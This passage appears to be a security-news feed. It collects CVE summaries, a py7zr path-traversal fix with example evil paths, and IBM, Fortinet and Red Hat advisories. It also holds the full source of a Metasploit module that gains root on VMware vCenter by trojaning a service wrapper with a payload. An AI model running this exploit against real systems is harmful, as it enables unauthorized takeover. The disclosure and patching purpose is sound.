A directory traversal vulnerability in the SevenZipFile.extractall() function of the python library py7zr v0.20.0 and earlier allows attackers to write arbitrary files via extracting a crafted 7z file.

Permalink

Browse files

Fix sanity check for path traversal attack

\- Previous versions do not detect the attack in some case
   - fixed it by call resolve()
   - resolve() converts "/hoge/fuga/../../../tmp/evil.sh" to be "/tmp/evil.sh" then
     relative\_to() can detect path traversal attack.
- Add path checker in writef() and writestr() methods
  - When pass arcname as evil path such as "../../../../tmp/evil.sh"
    it raises ValueError
- Add test case of bad path detection
- extraction: check symlink and junction is under target folder
- Fix relative\_path\_marker removal
- Don't put windows file namespace to output file path

Signed-off-by: Hiroshi Miura <miurahr@linux.com>

*   Loading branch information

CVE-2022-44900: Fix sanity check for path traversal attack · miurahr/py7zr@1bb43f1

CISA gives agencies deadline to patch against Google Chrome bug being actively exploited in the wild.

Although details about its real-world impact are vague, the Cybersecurity and Infrastructure Security Agency (CISA) added a Google Chrome flaw to its list of Known Exploited Vulnerabilities Catalog.

Google has already released a fixed version of Chrome browser for Windows, Mac, and Linux users. CISA has given government agencies until Dec. 26 to get a patch in place.

Tracked under CVE-2022-4262, CISA described the Google Chrome V8 Engine flaw as a "type confusion vulnerability." Attackers can exploit this kind of vulnerability by using a specially crafted HTML page to corrupt the heap and crashing the browser. Attackers can also exploit type confusion flaws to execute arbitrary code. An exploit for CVE-2022-4262 already exists in the wild, according to Google.

"Specific impacts from exploitation are not available at this time," CISA added.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Google Chrome Flaw Added to CISA Patch List

IBM Spectrum Scale 5.1.0.1 through 5.1.4.1 could allow a local attacker to execute arbitrary commands in the container. IBM X-Force ID: 239437.

  

**Summary**

A security vulnerability has been identified in IBM Spectrum Scale Container Native Access Storage that could allow a local attacker to execute arbitrary commands. A fix for this vulnerability is available.

**Vulnerability Details**

**CVEID:**   CVE-2022-43867  
**DESCRIPTION:**   IBM Spectrum Scale could allow a local attacker to execute arbitrary commands in the container.  
CVSS Base score: 7.8  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/239437 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM Spectrum Scale Container Native Storage Access

V5.1.0.1 - V5.1.4.1

**Remediation/Fixes**

For IBM Spectrum Scale Container Native Storage Access V5.1.0.1 - V5.1.4.1, apply 5.1.5.0 or later.

Please follow the IBM Spectrum Scale Container Native instructions for upgrade steps to Spectrum Scale Container Native Storage Access 5.1.5.0:  https://www.ibm.com/docs/en/scalecontainernative

**Note** that the non-containerized downloads of Spectrum Scale are available on FixCentral here if you'd like to uplevel the storage cluster to match the Spectrum Scale Container Native 5.1.5.0 level.

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

06 Dec 2022: Updated the bulletin with minor changes.

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"STXKQY","label":"IBM Spectrum Scale"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"5.1.x","Edition":"","Line of Business":{"code":"LOB26","label":"Storage"}}\]

CVE-2022-43867: Security Bulletin: A vulnerability in IBM Spectrum Scale could allow a local attacker to execute arbitrary commands (CVE-2022-43867)

An XML external entity (XXE) injection vulnerability in Kwoksys Kwok Information Server before v2.9.5.SP31 allows remote authenticated users to conduct server-side request forgery (SSRF) attacks.

CVE-2022-45326: Kwoksys 2.9.5 XXE

Multiple instances of improper input validation vulnerability in Fortinet FortiADC version 7.1.0, version 7.0.0 through 7.0.2 and version 6.2.4 and below allows an authenticated attacker to retrieve files with specific extension from the underlying Linux system via crafted HTTP requests.

** PSIRT Advisories**

**FortiADC - Improper input validation in download features**

**Summary**

Multiple improper input validation vulnerabilities \[CWE-20\] may allow an authenticated attacker to retrieve files with specific extensions from the underlying Linux system via crafted HTTP requests.

**Affected Products**

FortiADC version 7.1.0  
FortiADC version 7.0.0 through 7.0.2  
FortiADC version 6.2.0 through 6.2.4  
FortiADC version 6.1 all versions  
FortiADC version 6.0 all versions  
FortiADC version 5.4 all versions  
FortiADC version 5.3 all versions  
FortiADC version 5.2 all versions  
FortiADC version 5.1 all versions

**Solutions**

Please upgrade to FortiADC version 7.1.1 or above  
Please upgrade to FortiADC version 7.0.3 or above  
Please upgrade to FortiADC version 6.2.5 or above

**Acknowledgement**

Internally discovered and reported by Théo Leleu of Fortinet Product Security team.

CVE-2022-33876: Fortiguard

This Metasploit module exploits a privilege escalation in vSphere/vCenter due to improper permissions on the /usr/lib/vmware-vmon/java-wrapper-vmon file. It is possible for anyone in the cis group to write to the file, which will execute as root on vmware-vmon service restart or host reboot. This module was successfully tested against VMware VirtualCenter 6.5.0 build-7070488. Vulnerable versions should include vCenter 7.0 before U2c, vCenter 6.7 before U3o, and vCenter 6.5 before U3q.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ManualRanking  include Msf::Post::Linux::Priv  include Msf::Post::File  include Msf::Exploit::EXE  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'VMware vCenter vScalation Priv Esc',        'Description' => %q{          This module exploits a privilege escalation in vSphere/vCenter due to improper permissions on the          /usr/lib/vmware-vmon/java-wrapper-vmon file. It is possible for anyone in the          cis group to write to the file, which will execute as root on vmware-vmon service          restart or host reboot.          This module was successfully tested against VMware VirtualCenter 6.5.0 build-7070488.          The following versions should be vulnerable:          vCenter 7.0 before U2c          vCenter 6.7 before U3o          vCenter 6.5 before U3q        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # msf module          'Yuval Lazar' # original PoC, analysis        ],        'Platform' => [ 'linux' ],        'Arch' => [ ARCH_X86, ARCH_X64 ],        'SessionTypes' => [ 'shell', 'meterpreter' ],        'Targets' => [[ 'Auto', {} ]],        'Privileged' => true,        'References' => [          [ 'URL', 'https://pentera.io/blog/vscalation-cve-2021-22015-local-privilege-escalation-in-vmware-vcenter-pentera-labs/' ],          [ 'CVE', '2021-22015' ],          [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0020.html' ]        ],        'DisclosureDate' => '2021-09-21',        'DefaultTarget' => 0,        'DefaultOptions' => {          'WfsDelay' => 1800 # 30min        },        'Notes' => {          'Stability' => [CRASH_SERVICE_DOWN],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS],          'AKA' => ['vScalation']        }      )    )    register_advanced_options [      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])    ]  end  # Simplify pulling the writable directory variable  def base_dir    datastore['WritableDir'].to_s  end  def java_wrapper_vmon    '/usr/lib/vmware-vmon/java-wrapper-vmon'  end  def check    group_owner = cmd_exec("stat -c \"%G\" \"#{java_wrapper_vmon}\"")    if writable?(java_wrapper_vmon) && group_owner == 'cis'      return CheckCode::Appears("#{java_wrapper_vmon} is writable and owned by cis group")    end    CheckCode::Safe("#{java_wrapper_vmon} not owned by 'cis' group (owned by '#{group_owner}'), or not writable")  end  def exploit    # Check if we're already root    if is_root? && !datastore['ForceExploit']      fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'    end    # Make sure we can write our exploit and payload to the local system    unless writable? base_dir      fail_with Failure::BadConfig, "#{base_dir} is not writable"    end    # backup the original file    @backup = read_file(java_wrapper_vmon)    path = store_loot(      'java-wrapper-vmon.text',      'text/plain',      rhost,      @backup,      'java-wrapper-vmon.text'    )    print_good("Original #{java_wrapper_vmon} backed up to #{path}")    # Upload payload executable    payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"    print_status("Writing payload to #{payload_path}")    upload_and_chmodx payload_path, generate_payload_exe    register_files_for_cleanup payload_path    # write trojaned file    # we want to write our payload towards the top to ensure it gets run    # writing it at the bottom of the file results in the payload not being run    print_status("Writing trojaned #{java_wrapper_vmon}")    write_file(java_wrapper_vmon, @backup.gsub('#!/bin/sh', "#!/bin/sh\n#{payload_path} &\n"))    # try to restart the service    print_status('Attempting to restart vmware-vmon service (systemctl restart vmware-vmon.service)')    service_restart = cmd_exec('systemctl restart vmware-vmon.service')    # one error i'm seeing when using vsphere-client is: Failed to restart vmware-vmon.service: The name org.freedesktop.PolicyKit1 was not provided by any .service files    if service_restart.downcase.include?('access denied') || service_restart.downcase.include?('failed')      print_bad('vmware-vmon service needs to be restarted, or host rebooted to obtain shell.')    end    print_status("Waiting #{datastore['WfsDelay']} seconds for shell")  end  def cleanup    unless @backup.nil?      print_status("Replacing trojaned #{java_wrapper_vmon} with original")      write_file(java_wrapper_vmon, @backup)    end    super  endend

VMware vCenter vScalation Privilege Escalation

Red Hat Security Advisory 2022-8799-01 - The Public Key Infrastructure Core contains fundamental packages required by Red Hat Certificate System.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: pki-core security update  
Advisory ID:       RHSA-2022:8799-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8799  
Issue date:        2022-12-06  
CVE Names:         CVE-2022-2414  
====================================================================  
1. Summary:

An update for pki-core is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64le, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, ppc64le, s390x  
Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch

3. Description:

The Public Key Infrastructure (PKI) Core contains fundamental packages  
required by Red Hat Certificate System.

Security Fix(es):

* pki-core: access to external entities when parsing XML can lead to XXE  
(CVE-2022-2414)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2104676 - CVE-2022-2414 pki-core: access to external entities when parsing XML can lead to XXE

6. Package List:

Red Hat Enterprise Linux Client Optional (v. 7):

Source:  
pki-core-10.5.18-24.el7_9.src.rpm

noarch:  
pki-base-10.5.18-24.el7_9.noarch.rpm  
pki-base-java-10.5.18-24.el7_9.noarch.rpm  
pki-ca-10.5.18-24.el7_9.noarch.rpm  
pki-javadoc-10.5.18-24.el7_9.noarch.rpm  
pki-kra-10.5.18-24.el7_9.noarch.rpm  
pki-server-10.5.18-24.el7_9.noarch.rpm

x86_64:  
pki-core-debuginfo-10.5.18-24.el7_9.x86_64.rpm  
pki-symkey-10.5.18-24.el7_9.x86_64.rpm  
pki-tools-10.5.18-24.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

Source:  
pki-core-10.5.18-24.el7_9.src.rpm

noarch:  
pki-base-10.5.18-24.el7_9.noarch.rpm  
pki-base-java-10.5.18-24.el7_9.noarch.rpm  
pki-ca-10.5.18-24.el7_9.noarch.rpm  
pki-javadoc-10.5.18-24.el7_9.noarch.rpm  
pki-kra-10.5.18-24.el7_9.noarch.rpm  
pki-server-10.5.18-24.el7_9.noarch.rpm

x86_64:  
pki-core-debuginfo-10.5.18-24.el7_9.x86_64.rpm  
pki-symkey-10.5.18-24.el7_9.x86_64.rpm  
pki-tools-10.5.18-24.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
pki-core-10.5.18-24.el7_9.src.rpm

noarch:  
pki-base-10.5.18-24.el7_9.noarch.rpm  
pki-base-java-10.5.18-24.el7_9.noarch.rpm  
pki-ca-10.5.18-24.el7_9.noarch.rpm  
pki-kra-10.5.18-24.el7_9.noarch.rpm  
pki-server-10.5.18-24.el7_9.noarch.rpm

ppc64le:  
pki-core-debuginfo-10.5.18-24.el7_9.ppc64le.rpm  
pki-tools-10.5.18-24.el7_9.ppc64le.rpm

x86_64:  
pki-core-debuginfo-10.5.18-24.el7_9.x86_64.rpm  
pki-symkey-10.5.18-24.el7_9.x86_64.rpm  
pki-tools-10.5.18-24.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

Source:  
pki-core-10.5.18-24.el7_9.src.rpm

noarch:  
pki-base-10.5.18-24.el7_9.noarch.rpm  
pki-base-java-10.5.18-24.el7_9.noarch.rpm  
pki-ca-10.5.18-24.el7_9.noarch.rpm  
pki-javadoc-10.5.18-24.el7_9.noarch.rpm  
pki-kra-10.5.18-24.el7_9.noarch.rpm  
pki-server-10.5.18-24.el7_9.noarch.rpm

ppc64:  
pki-core-debuginfo-10.5.18-24.el7_9.ppc64.rpm  
pki-symkey-10.5.18-24.el7_9.ppc64.rpm  
pki-tools-10.5.18-24.el7_9.ppc64.rpm

ppc64le:  
pki-core-debuginfo-10.5.18-24.el7_9.ppc64le.rpm  
pki-symkey-10.5.18-24.el7_9.ppc64le.rpm

s390x:  
pki-core-debuginfo-10.5.18-24.el7_9.s390x.rpm  
pki-symkey-10.5.18-24.el7_9.s390x.rpm  
pki-tools-10.5.18-24.el7_9.s390x.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
pki-core-10.5.18-24.el7_9.src.rpm

noarch:  
pki-base-10.5.18-24.el7_9.noarch.rpm  
pki-base-java-10.5.18-24.el7_9.noarch.rpm  
pki-ca-10.5.18-24.el7_9.noarch.rpm  
pki-kra-10.5.18-24.el7_9.noarch.rpm  
pki-server-10.5.18-24.el7_9.noarch.rpm

x86_64:  
pki-core-debuginfo-10.5.18-24.el7_9.x86_64.rpm  
pki-symkey-10.5.18-24.el7_9.x86_64.rpm  
pki-tools-10.5.18-24.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

noarch:  
pki-javadoc-10.5.18-24.el7_9.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2414  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY487xdzjgjWX9erEAQg5oQ//aEHlyg76MCBy/Czm84niXRrvfg+eJzzh  
A3AzrX3LMRWYrJSfv+NFx2eEaZtzwqi0O1Dser5NM6Wper9Qvp2XrtZTjJmPxu03  
LMEYFeMXJXPMEaO+luV+gJe+BfXCGo7yGbnHUZbKYapr1cLiphU+Lt3phx+fZu9P  
3mQdGfCuaCfi+7uzctc9ybYy1bvi/UqbQ0K+f68XrFbp4+wM+QeLFvvqx8eIC2Mk  
aLKZYTePpSCk6YSlSZTVfDIWhX5fz6E+LXD8CqNlcBYNRY3JAhdYthtMPtS7wthk  
ioPQ4mWERDR+W5WTJoH11G6iiORsnziYK8Ea5+DIKDSxPtmdFYaEUwaUpP5izCkQ  
q9LkvwN7jBgdFbam/x77/yLSkBSYBJEs5nOc+xr9FvJnNLZE6deHYzQYhlD/a5Ha  
msiHvkStwKNudFy4AqVn9ytyH74kpUImVMh2/4TIXPAypdmU00rtV8rAkGZo2XON  
M9c6/p72cW9G/GpgTuU5enpafmqkB7EZUS77nX2S+uCWRmL3mC/38rm6THbioMkw  
8/BdLK12waoVzs8tjK/ncuziJujIRaKBAa/nrmqts2CMt4/yytPLYrVhzkUTqHiM  
cZJCCyo1Ra4+mDq/TogwSnMxIY6j6LFbfFkzzUIMtHp30a87Bp0yvy3js8E3+i6C  
5W4lq2gL0Jk=jk91  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8799-01

Red Hat Security Advisory 2022-8806-01 - The USBGuard software framework provides system protection against intrusive USB devices by implementing basic whitelisting and blacklisting capabilities based on device attributes. To enforce a user-defined policy, USBGuard uses the Linux kernel USB device authorization feature.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: usbguard security update  
Advisory ID:       RHSA-2022:8806-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8806  
Issue date:        2022-12-06  
CVE Names:         CVE-2019-25058  
====================================================================  
1. Summary:

An update for usbguard is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The USBGuard software framework provides system protection against  
intrusive USB devices by implementing basic whitelisting and blacklisting  
capabilities based on device attributes. To enforce a user-defined policy,  
USBGuard uses the Linux kernel USB device authorization feature.

Security Fix(es):

* usbguard: Fix unauthorized access via D-Bus (CVE-2019-25058)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2058465 - CVE-2019-25058 usbguard: Fix unauthorized access via D-Bus

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
usbguard-1.0.0-8.el8_6.1.src.rpm

aarch64:  
usbguard-1.0.0-8.el8_6.1.aarch64.rpm  
usbguard-dbus-1.0.0-8.el8_6.1.aarch64.rpm  
usbguard-dbus-debuginfo-1.0.0-8.el8_6.1.aarch64.rpm  
usbguard-debuginfo-1.0.0-8.el8_6.1.aarch64.rpm  
usbguard-debugsource-1.0.0-8.el8_6.1.aarch64.rpm  
usbguard-notifier-1.0.0-8.el8_6.1.aarch64.rpm  
usbguard-notifier-debuginfo-1.0.0-8.el8_6.1.aarch64.rpm  
usbguard-tools-1.0.0-8.el8_6.1.aarch64.rpm  
usbguard-tools-debuginfo-1.0.0-8.el8_6.1.aarch64.rpm

noarch:  
usbguard-selinux-1.0.0-8.el8_6.1.noarch.rpm

ppc64le:  
usbguard-1.0.0-8.el8_6.1.ppc64le.rpm  
usbguard-dbus-1.0.0-8.el8_6.1.ppc64le.rpm  
usbguard-dbus-debuginfo-1.0.0-8.el8_6.1.ppc64le.rpm  
usbguard-debuginfo-1.0.0-8.el8_6.1.ppc64le.rpm  
usbguard-debugsource-1.0.0-8.el8_6.1.ppc64le.rpm  
usbguard-notifier-1.0.0-8.el8_6.1.ppc64le.rpm  
usbguard-notifier-debuginfo-1.0.0-8.el8_6.1.ppc64le.rpm  
usbguard-tools-1.0.0-8.el8_6.1.ppc64le.rpm  
usbguard-tools-debuginfo-1.0.0-8.el8_6.1.ppc64le.rpm

s390x:  
usbguard-1.0.0-8.el8_6.1.s390x.rpm  
usbguard-dbus-1.0.0-8.el8_6.1.s390x.rpm  
usbguard-dbus-debuginfo-1.0.0-8.el8_6.1.s390x.rpm  
usbguard-debuginfo-1.0.0-8.el8_6.1.s390x.rpm  
usbguard-debugsource-1.0.0-8.el8_6.1.s390x.rpm  
usbguard-notifier-1.0.0-8.el8_6.1.s390x.rpm  
usbguard-notifier-debuginfo-1.0.0-8.el8_6.1.s390x.rpm  
usbguard-tools-1.0.0-8.el8_6.1.s390x.rpm  
usbguard-tools-debuginfo-1.0.0-8.el8_6.1.s390x.rpm

x86_64:  
usbguard-1.0.0-8.el8_6.1.i686.rpm  
usbguard-1.0.0-8.el8_6.1.x86_64.rpm  
usbguard-dbus-1.0.0-8.el8_6.1.x86_64.rpm  
usbguard-dbus-debuginfo-1.0.0-8.el8_6.1.i686.rpm  
usbguard-dbus-debuginfo-1.0.0-8.el8_6.1.x86_64.rpm  
usbguard-debuginfo-1.0.0-8.el8_6.1.i686.rpm  
usbguard-debuginfo-1.0.0-8.el8_6.1.x86_64.rpm  
usbguard-debugsource-1.0.0-8.el8_6.1.i686.rpm  
usbguard-debugsource-1.0.0-8.el8_6.1.x86_64.rpm  
usbguard-notifier-1.0.0-8.el8_6.1.x86_64.rpm  
usbguard-notifier-debuginfo-1.0.0-8.el8_6.1.i686.rpm  
usbguard-notifier-debuginfo-1.0.0-8.el8_6.1.x86_64.rpm  
usbguard-tools-1.0.0-8.el8_6.1.x86_64.rpm  
usbguard-tools-debuginfo-1.0.0-8.el8_6.1.i686.rpm  
usbguard-tools-debuginfo-1.0.0-8.el8_6.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2019-25058  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY4870NzjgjWX9erEAQiXOw/+NSx4Joq7F6IbS69zkEhwyRlQNt8UtKfq  
ThFnQCebAlZF1yGTgA2aFf7IBZ0WaWRKTAcMCR+G5yhH6yl7YkixtJPXgeELHlBH  
rqS/538YYXhXAuE4V7a/Ne/sXktS7r7hhv0/o6JdxUtjZhC64MAQV5usckGWp0Oy  
YnQYk94xffjg5EJN9Rlmg9j6KBwMcConIxK8B+RzGEdJN6lUiVXqcttD0NLIcZh3  
s92CCl/eJn+aVqK0i4eIbTKV67bfCKYG7A4fjqkFK6fxbb+kbFJ5cZUVFdTjnCPp  
t1FAo/auHzj/v/RTKPP7hNzfAsEILvhjsB5x1/EzG+QzKUft2iaOFXJzXSbKnuc3  
gzMq6LDkoCd6LK4QuGQ2zGMWTM1WGv4ig0FfMG7Lzi+JgyRpdKLd7Ns5yFLDzzDx  
pnCFyvF6qvmMXs6nYGyWTu0oisrEHzy+Qcdwag3sEAyvqBdbDBojmR7wlNA/ZUTX  
Hkcc/XfqT+AhBBSSpZO+in89VRYFxOlvnICVSAgz5ObtqoJHhSgjmiYCMweNkRJC  
biwneXhsIcZmXvOOAxJ5WZ2YzL9S+lnYO9Dmo2CKESjkdmCmXoxKW4hqk2MB0nyx  
dEuNyk0f6R8HqdbimBonVPdf3NCMUWmNv4bVBeyev8/Us1jwF0MpAMIsz7y0hKlg  
dO0UEWhMbCY=OUEn  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8806-01

Red Hat Security Advisory 2022-8809-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include an out of bounds write vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security and bug fix update  
Advisory ID:       RHSA-2022:8809-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8809  
Issue date:        2022-12-06  
CVE Names:         CVE-2022-1158 CVE-2022-2639   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v.8.6) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux BaseOS EUS (v.8.6) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: KVM: cmpxchg_gpte can write to pfns outside the userspace region  
(CVE-2022-1158)

* kernel: openvswitch: integer underflow leads to out-of-bounds write in  
reserve_sfa_size() (CVE-2022-2639)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* x86/intel: processors require energy_perf_bias setting (BZ#2102103)

* System crashes due to list_add double add at  
iwl_mvm_mac_wake_tx_queue+0x71 (BZ#2112264)

* Fix SCHED_WARN_ON deadlock (BZ#2125422)

* Starting VMs on a KVM-host with EL8.6-kernel sometimes produces timejumps  
into the future for other already running guest-VMs [rhel.8] (BZ#2125671)

* RHEL8.4 - zfcp: fix missing auto port scan and thus missing target ports  
(BZ#2127850)

* vfio zero page mappings fail after 2M instances (BZ#2128516)

* The kernel needs to offer a way to reseed the Crypto DRBG and atomically  
extract random numbers from it (BZ#2129728)

* ice: Driver Update up to 5.19 (BZ#2130993)

* virtio-net: support XDP when not more queues (BZ#2131740)

* VMs hang after migration (BZ#2131756)

* Update NVME subsystem with bug fixes and minor changes (BZ#2132555)

* [HPE BUG] Premature swapping with swappiness=0 while there’s still plenty  
of pagecache to be reclaimed. (BZ#2133831)

* nf_conntrack causing nfs to stall (BZ#2134089)

* Fix issue that enables STABLE_WRITES by default and causes performance  
regressions (BZ#2135814)

* [ice] Intel E810 PTP clock glitching (BZ#2136037)

* ice: arp replies not making it to switch (BZ#2136043)

* [ice]configure link-down-on-close on and change interface mtu to 9000,the  
interface can't up (BZ#2136217)

* ice: dump additional CSRs for Tx hang debugging (BZ#2136514)

* crypto/testmgr.c should not list dh, ecdh as .fips_allowed = 1  
(BZ#2136525)

* FIPS module identification via name and version (BZ#2136540)

* FIPS self-tests for RSA pkcs7 signature verification (BZ#2137316)

* After upgrading to ocp4.11.1, our dpdk application using vlan strip  
offload is not working (BZ#2138158)

* WARNING: CPU: 0 PID: 9637 at kernel/time/hrtimer.c:1309  
hrtimer_start_range_ns+0x35d/0x400 (BZ#2138954)

* [DELL EMC 8.6-RT BUG] System is not booting into RT Kernel with perc12.  
(BZ#2139217)

* Cannot trigger kernel dump using NMI on SNO node running PAO and RT  
kernel (BZ#2139581)

* Laser bias information can't be shown by ethtool on rhel8.6 (BZ#2139638)

* Nested KVM is not working on RHEL 8.6 with hardware error 0x7  
(BZ#2140144)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2069793 - CVE-2022-1158 kernel: KVM: cmpxchg_gpte can write to pfns outside the userspace region  
2084479 - CVE-2022-2639 kernel: openvswitch: integer underflow leads to out-of-bounds write in reserve_sfa_size()

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.8.6):

Source:  
kernel-4.18.0-372.36.1.el8_6.src.rpm

aarch64:  
bpftool-4.18.0-372.36.1.el8_6.aarch64.rpm  
bpftool-debuginfo-4.18.0-372.36.1.el8_6.aarch64.rpm  
kernel-4.18.0-372.36.1.el8_6.aarch64.rpm  
kernel-core-4.18.0-372.36.1.el8_6.aarch64.rpm  
kernel-cross-headers-4.18.0-372.36.1.el8_6.aarch64.rpm  
kernel-debug-4.18.0-372.36.1.el8_6.aarch64.rpm  
kernel-debug-core-4.18.0-372.36.1.el8_6.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-372.36.1.el8_6.aarch64.rpm  
kernel-debug-devel-4.18.0-372.36.1.el8_6.aarch64.rpm  
kernel-debug-modules-4.18.0-372.36.1.el8_6.aarch64.rpm  
kernel-debug-modules-extra-4.18.0-372.36.1.el8_6.aarch64.rpm  
kernel-debuginfo-4.18.0-372.36.1.el8_6.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-372.36.1.el8_6.aarch64.rpm  
